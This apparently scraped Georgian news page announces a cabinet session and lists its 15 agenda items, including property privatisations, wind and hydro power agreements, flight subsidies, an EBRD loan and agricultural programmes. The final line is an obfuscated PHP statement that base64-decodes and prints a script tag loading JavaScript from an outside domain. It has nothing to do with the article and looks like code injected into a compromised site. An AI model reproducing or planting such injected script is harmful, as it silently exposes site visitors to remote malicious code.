celsiusi
ავერსი საქკაბელი

 დღეს, მთავრობის ადმინისტრაციაში მთავრობის სხდომა 14:00 საათზე გაიმართება. ადმინისტრაციის ინფორმაციით, მინისტრთა კაბინეტი დღის წესრიგით გათვალისწინებულ 15 საკითხს განიხილავს:

  1. საქართველოს მთავრობის განკარგულების პროექტი „სახელმწიფო საკუთრებაში არსებული უძრავი ქონების შპს "ვეფხვისათვის“ პირდაპირი მიყიდვის ფორმით პრივატიზების შესახებ“ საქართველოს მთავრობის 2022 წლის 26 აპრილის №750 განკარგულებაში ცვლილების შეტანის თაობაზე”, მომხსენებელი: ეკონომიკის მინისტრი ლევან დავითაშვილი;
  2. საქართველოს მთავრობის განკარგულების პროექტი „საქართველოს მთავრობის 2022 წლის 1 თებერვლის N184 განკარგულებაში ცვლილების შეტანის თაობაზე“, მომხსენებელი: ეკონომიკის მინისტრი ლევან დავითაშვილი;
  3. საქართველოს მთავრობის განკარგულების პროექტი ,,სახელმწიფო საკუთრებაში არსებული უძრავი ქონების ფ/პ ნათია კაციტაძისათვის პირდაპირი მიყიდვის ფორმით პრივატიზების შესახებ”, მომხსენებელი: ეკონომიკის მინისტრი ლევან დავითაშვილი;
  4. საქართველოს მთავრობის განკარგულების პროექტი „სახელმწიფო საკუთრებაში არსებული უძრავი ქონების შპს „ამბასადორი ბათუმი აილენდისათვის“ აღნაგობის უფლებით გადაცემაზე თანხმობის გაცემის შესახებ“ საქართველოს მთავრობის 2021 წლის 27 სექტემბრის №1711 განკარგულებაში ცვლილების შეტანის თაობაზე”, მომხსენებელი: ეკონომიკის მინისტრი ლევან დავითაშვილი;
  5. საქართველოს მთავრობის განკარგულების პროექტი ,,ფ/პ არჩილ მიქუჭაძის საქმიანობის ხელშესაწყობად რიგ ღონისძიებათა განხორციელების თაობაზე”, მომხსენებელი: ეკონომიკის მინისტრი ლევან დავითაშვილი;
  6. საქართველოს მთავრობის განკარგულების პროექტი „საქართველოს მთავრობას, სს „ელექტროენერგეტიკული სისტემის კომერციულ ოპერატორს“, სს „საქართველოს სახელმწიფო ელექტროსისტემას“ და შპს „უსასრულო ენერგიას“ შორის „იმერეთი 1“ ქარის ელექტროსადგურის განხორციელების ხელშეკრულების თაობაზე განსახორციელებელი რიგი ღონისძიებების თაობაზე“, მომხსენებელი: ეკონომიკის მინისტრი ლევან დავითაშვილი;
  7. საქართველოს მთავრობის განკარგულების პროექტი "საქართველოს მთავრობას, სს „საქართველოს სახელმწიფო ელექტროსისტემას“, სს „ელექტროენერგეტიკული სისტემის კომერციულ ოპერატორსა“ და შპს "ბახვი 2"-ს შორის "ბახვი 2ა" და „ბახვი 2ბ“ ჰიდროელექტროსადგურების პროექტების განხორციელების უფლების დატვირთვის თაობაზე წინასწარი თანხმობის მიცემის შესახებ”, მომხსენებელი: ეკონომიკის მინისტრი ლევან დავითაშვილი;
  8. საქართველოს მთავრობის განკარგულებების პროექტები "საქართველოს სამოქალაქო აეროპორტებში მგზავრთა გადაყვანისა და ტურიზმის ხელშეწყობის მიზნით ავიარეისების ორგანიზებისათვის განსახორციელებელი ღონისძიებების შესახებ” "თბილისი-ბათუმი-თბილისის ავიამიმართულებაზე მგზავრთა გადაყვანისა და ტურიზმის ხელშეწყობის მიზნით ავიარეისების ორგანიზებისათვის განსახორციელებელი ღონისძიებების შესახებ“, მომხსენებელი: ეკონომიკის მინისტრი ლევან დავითაშვილი;
  9. საქართველოს მთავრობის დადგენილების პროექტი „კაპიტალის ბაზრის მხარდაჭერის“ სახელმწიფო პროგრამის დამტკიცების შესახებ”, მომხსენებელი: ეკონომიკის მინისტრი ლევან დავითაშვილი;
  10. საქართველოს მთავრობის დადგენილების პროექტი „სამშენებლო პროდუქტების შესახებ ტექნიკური რეგლამენტის დამტკიცების თაობაზე“ საქართველოს მთავრობის 2018 წლის 1 ოქტომბრის №476 დადგენილებაში ცვლილების შეტანის თაობაზე“, მომხსენებელი: ეკონომიკის მინისტრი ლევან დავითაშვილი;
  11. საქართველოს მთავრობის განკარგულების პროექტი "საგადასახადო შეთანხმებების გაფორმების შესახებ”, მომხსენებელი: ფინანსთა მინისტრი ლაშა ხუციშვილი;
  12. საქართველოს მთავრობის განკარგულების პროექტი „აჭარის მყარი ნარჩენების პროექტ - ფაზა II-თან“ დაკავშირებით საქართველოსა და ევროპის რეკონსტრუქციისა და განვითარების ბანკს (EBRD) შორის 2023 წლის 2 მარტს გაფორმებული სასესხო შეთანხმების ფარგლებში დამატებითი დაფინანსების მოზიდვის შესახებ", მომხსენებელი: ფინანსთა მინისტრი ლაშა ხუციშვილი;
  13. საქართველოს მთავრობის დადგენილების პროექტი „გაეროს კლიმატის ცვლილების ჩარჩოკონვენციის „პარიზის შეთანხმებით“ გათვალისწინებული – „საქართველოს განახლებული ეროვნულ დონეზე განსაზღვრული წვლილის (NDC)“, საქართველოს კლიმატის ცვლილების 2030 წლის სტრატეგიისა და საქართველოს კლიმატის ცვლილების 2030 წლის სტრატეგიის 2021 – 2023 წლების სამოქმედო გეგმის დამტკიცების თაობაზე“ საქართველოს მთავრობის 2021 წლის 8 აპრილის N167 დადგენილებაში ცვლილების შეტანის შესახებ“, მომხსენებელი: სოფლის მეურნეობის მინისტრი ოთარ შამუგია;
  14. საქართველოს მთავრობის დადგენილების პროექტი "მაღალმთიან დასახლებებში სასოფლო-სამეურნეო ტექნიკის თანადაფინანსების პროგრამის დამტკიცების შესახებ”, მომხსენებელი: სოფლის მეურნეობის მინისტრი ოთარ შამუგია;
  15. საქართველოს მთავრობის განკარგულების პროექტი „შეღავათიანი აგროკრედიტის პროექტისა და გადამმუშავებელი და შემნახველი საწარმოების თანადაფინანსების პროექტის დამტკიცების შესახებ“ საქართველოს მთავრობის 2014 წლის 27 იანვრის №139 განკარგულებაში ცვლილების შეტანის თაობაზე”, მომხსენებელი: სოფლის მეურნეობის მინისტრი ოთარ შამუგია;
177
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");